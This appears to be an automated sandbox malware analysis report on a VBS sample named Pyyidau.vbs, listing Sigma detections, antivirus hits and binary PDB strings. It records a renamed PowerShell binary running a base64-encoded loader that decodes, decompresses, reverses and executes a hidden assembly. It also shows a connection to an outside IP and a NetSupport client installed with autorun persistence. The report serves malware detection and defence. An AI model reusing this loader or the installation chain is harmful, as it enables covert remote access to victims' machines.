FMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, ParentImage: C:\Users\user\Desktop\Pyyidau.vbs.exe, ParentProcessId: 2916, ParentProcessName: Pyyidau.vbs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , ProcessId: 2496, ProcessName: wscript.exe
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=, ParentImage: C:\Users\user\Desktop\Pyyidau.vbs.exe, ParentProcessId: 2916, ParentProcessName: Pyyidau.vbs.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs" , ProcessId: 2496, ProcessName: wscript.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", ProcessId: 7060, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: Client32Provider, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, ProcessId: 2816, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{71C5A887-11E0-4c5a-9B9B-D4A074555692}\(Default)
                                Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Pyyidau.vbs.exe, ProcessId: 2916, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzha1xoy.ipd.ps1
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.126.113.166, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                                Sigma detected: Suspicious Copy From or To System Directory
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3904, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y, ProcessId: 6176, ProcessName: cmd.exe
                                Sigma detected: Suspicious Execution From GUID Like Folder Names
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", CommandLine: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\msiexec.exe /V, ParentImage: C:\Windows\System32\msiexec.exe, ParentProcessId: 2720, ParentProcessName: msiexec.exe, ProcessCommandLine: cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic", ProcessId: 5016, ProcessName: cmd.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs", ProcessId: 7060, ProcessName: wscript.exe
                                Sigma detected: Windows Processes Suspicious Parent Directory
                                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1892, ProcessName: svchost.exe

                                Suricata Signatures

                                No Suricata rule has matched

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for submitted file
                                Source: Pyyidau.vbsReversingLabs: Detection: 15%
                                Source: Pyyidau.vbsVirustotal: Detection: 25%Perma Link
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\setupact.log
                                Source: C:\Windows\Installer\MSI3FCC.tmpFile created: C:\Windows\setuperr.log
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: C:\Program Files (x86)\NetSupport\NetSupport Manager\MSVCR100.dll
                                Source: unknownHTTPS traffic detected: 176.126.113.166:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdb4 source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernel32.pdb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2701499634.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ucrtbase.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\x64\release_unicode\winst64.pdb source: winst64.exe, 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdb source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, MSI264F.tmp, 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI2BE4.tmp, 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI3FCC.tmp, 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI51C1.tmp, 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: winspool.pdbM source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcrt.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wldap32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\exe\client32.pdb source: client32.exe, 00000026.00000003.2700723405.000000000097B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\system32\wkernel32.pdb source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: pcicfgui_client.exe, 00000024.00000002.2673326583.00000000026C0000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000003.2750993608.0000000007200000.00000020.00001000.00020000.00000000.sdmp, client32.exe, 0000002D.00000003.2801948506.0000000008B90000.00000020.00001000.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdbD source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: protobuf-net.pdbSHA256}Lq source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp!D source: MSI3FCC.tmp, 00000020.00000002.2628823343.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp, MSI3FCC.tmp, 00000020.00000000.2599496607.00000000001F9000.00000002.00000001.01000000.0000000E.sdmp
                                Source: Binary string: protobuf-net.pdb source: Pyyidau.vbs.exe, 00000003.00000002.1836032998.0000000008200000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: winnsi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: cryptsp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: d3d12.pdbt$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: advapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wsspicli.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: secur32.pdbc source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: activeds.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb`ak source: client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmp
                                Source: Binary string: msi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\ctl32\release_unicode\pcichek.pdb source: pcicfgui_client.exe, 00000024.00000002.2702316881.000000006F952000.00000002.00000001.01000000.00000019.sdmp, client32.exe, 00000026.00000002.2721376818.000000006F952000.00000002.00000001.01000000.00000019.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000028.00000002.2770804463.000000006F952000.00000002.00000001.01000000.00000019.sdmp
                                Source: Binary string: wuser32.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mpr.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: d3d11.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: usp10.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dxdiagn.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbE source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkscli.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb@ source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: bcrypt.pdbG source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dwmapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdbl source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: WINMMBASE.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb\* source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: comdlg32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ws2_32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ole32.pdbe source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winspool.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: sfxcab.pdb source: Pyyidau.vbs.exe, 00000003.00000002.1838008382.0000000008C73000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1747546684.0000000001002000.00000040.00000400.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\x64\Release\CloseHookApp64.pdb source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: nsi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\nsmsrc\ReProcessWindowshortcuts\Release\ReProcessWindowshortcuts.pdb source: wscript.exe, 00000005.00000003.2456340850.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winmm.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powrprof.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ole32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: activeds.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: WINMMBASE.pdbH$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msasn1.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: cfgmgr32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: combase.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Windows.Storage.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\wkernel32.pdb source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: powershell.pdbUGP source: Pyyidau.vbs.exe, 00000003.00000000.1717706981.0000000000271000.00000020.00000001.01000000.00000005.sdmp
                                Source: Binary string: wsock32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdbk, source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\exe\client32.pdbgI source: client32.exe, 00000026.00000003.2700723405.000000000097B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wininet.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: UMPDC.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: .pdb8 source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: dhcpcsvc.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: j.pdb source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\NSLBuilds\NSM\NSM14Trunk\licgen\Release_unicode\Licence.pdb source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: combase.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: comctl32.pdb! source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winhttp.pdbK source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdbg source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleacc.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.pdb*n source: client32.exe, 00000026.00000002.2703111799.000000000093E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700723405.000000000093A000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: shell32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: samcli.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msvcp100.i386.pdb source: pcicfgui_client.exe, 00000024.00000002.2701891569.000000006F801000.00000020.00000001.01000000.00000017.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2720898013.000000006F801000.00000020.00000001.01000000.00000017.sdmp, client32.exe, 00000028.00000002.2769954267.000000006F801000.00000020.00000001.01000000.00000017.sdmp
                                Source: Binary string: msvcr100.i386.pdb source: pcicfgui_client.exe, 00000024.00000002.2701331052.000000006CCC1000.00000020.00000001.01000000.00000018.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2720410623.000000006CCC1000.00000020.00000001.01000000.00000018.sdmp, client32.exe, 00000028.00000002.2769592741.000000006CCC1000.00000020.00000001.01000000.00000018.sdmp
